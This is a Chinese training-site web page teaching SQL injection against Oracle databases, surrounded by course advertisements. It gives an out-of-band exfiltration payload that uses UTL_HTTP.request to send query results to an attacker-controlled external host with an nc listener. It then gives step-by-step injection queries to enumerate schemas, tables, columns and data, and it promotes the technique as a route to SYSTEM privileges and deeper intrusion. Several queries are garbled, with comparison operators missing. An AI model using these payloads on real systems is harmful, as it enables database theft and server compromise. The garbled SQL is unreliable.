当前位置:首页 > 全部子站 > IT > Oracle

Oracle注射技术

来源:长理培训发布时间:2017-10-20 12:25:18

 首先外网nc监听对应的端口

  and UTL_HTTP.request("外网ip:port/"(sql语句))=1--

  爆库

  select owner from all_tables where rownum=1

  select owner from all_tables where owner"第一个库名"

  

  and rownum=1

  select owner from all_tables where owner"第一个库名"

  and owner"第二个"and rownum=1

  select owner from all_tables where owner"第一个库名"

  and owner"第一个库名" and rownum=1

  以此论推

  爆表

  select TABLE_NAME from all_tables where owner="库名"

  and rownum=1

  select TABLE_NAME from all_tables where owner="库名"

  and rownum=1 and TABLE_NAME"表名1"

  select TABLE_NAME from all_tables where owner="库名"andrownum=1

  and TABLE_NAME"表名1" and TABLE_NAME"表名2"

  以此论推

  爆列

  select COLUMN_NAME from user_tab_columns wheretable_name="表名"

  and rownum=1

  select COLUMN_NAME from user_tab_columns wheretable_name="表名"

  and rownum=1 and COLUMN_NAME"第一个爆出的列名"

  select COLUMN_NAME from user_tab_columns wheretable_name="表名"

  and rownum=1 and COLUMN_NAME"第一个爆出的列名"andCOLUMN_NAME"第二个爆出的列名"

  爆内容

  第一个内容:select 列名 from 表名 where rownum=1

  第二个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"

  第三个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"and列名"第二个值"

  以此论推

  注

  1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料

  2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁。

责编:罗莉

发表评论(共0条评论)
请自觉遵守互联网相关政策法规,评论内容只代表网友观点,发表审核后显示!

国家电网校园招聘考试直播课程通关班

  • 讲师:刘萍萍 / 谢楠
  • 课时:160h
  • 价格 4580

特色双名师解密新课程高频考点,送国家电网教材讲义,助力一次通关

配套通关班送国网在线题库一套

课程专业名称
讲师
课时
查看课程

国家电网招聘考试录播视频课程

  • 讲师:崔莹莹 / 刘萍萍
  • 课时:180h
  • 价格 3580

特色解密新课程高频考点,免费学习,助力一次通关

配套全套国网视频课程免费学习

课程专业名称
讲师
课时
查看课程
在线题库
面授课程更多>>
图书商城更多>>
在线报名
  • 报考专业:
    *(必填)
  • 姓名:
    *(必填)
  • 手机号码:
    *(必填)
返回顶部